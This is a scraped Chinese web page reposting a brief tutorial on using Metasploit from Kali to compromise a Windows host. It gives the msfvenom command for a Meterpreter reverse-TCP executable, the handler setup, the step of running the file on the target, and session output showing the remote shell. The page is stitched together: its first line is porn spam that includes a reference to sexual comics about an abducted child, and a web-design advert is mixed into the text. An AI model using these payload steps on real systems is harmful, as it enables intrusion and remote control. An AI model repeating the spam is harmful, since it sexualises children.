bl双性强迫侵犯h_国产在线观看人成激情视频_蜜芽188_被诱拐的少孩全彩啪啪漫画

Kali下Metasploit的shellcode在windows中的使用

網絡拓撲:
Kali下Metasploit的shellcode在windows中的使用
kaili系統版本:
Kali下Metasploit的shellcode在windows中的使用
注:前面的版本在生成shellcode的時候用的是msfpayload命令

創新互聯建站專注于企業成都全網營銷推廣、網站重做改版、崇義網站定制設計、自適應品牌網站建設、H5建站商城系統網站開發、集團公司官網建設、成都外貿網站制作、高端網站制作、響應式網頁設計等建站業務,價格優惠性價比高,為崇義等各大城市提供網站開發制作服務。

1.kaili生成shellcode:
root@debian:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.152.131 lport=1211 -f exe > /root/shell.exe
()
2.偵聽shellcode:

msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.152.131
lhost => 192.168.152.131
msf exploit(multi/handler) > set lport 1211
lport => 1211
msf exploit(multi/handler) > exploit 
[*] Started reverse TCP handler on 192.168.152.131:1211 

3.將生成的sehllcode上傳至windows主機中并運行:
Kali下Metasploit的shellcode在windows中的使用

4.已經有session返回

msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.152.131:1211 

[*] Sending stage (179779 bytes) to 192.168.152.129
[*] Meterpreter session 1 opened (192.168.152.131:1211 -> 192.168.152.129:1039) at 2018-02-24 07:58:44 +0000

5.成功拿到shell:
Kali下Metasploit的shellcode在windows中的使用

分享文章:Kali下Metasploit的shellcode在windows中的使用
網頁地址:http://vcdvsql.cn/article36/ggpgpg.html

成都網站建設公司_創新互聯,為您提供全網營銷推廣網站制作企業網站制作網站維護App設計用戶體驗

廣告

聲明:本網站發布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創新互聯

營銷型網站建設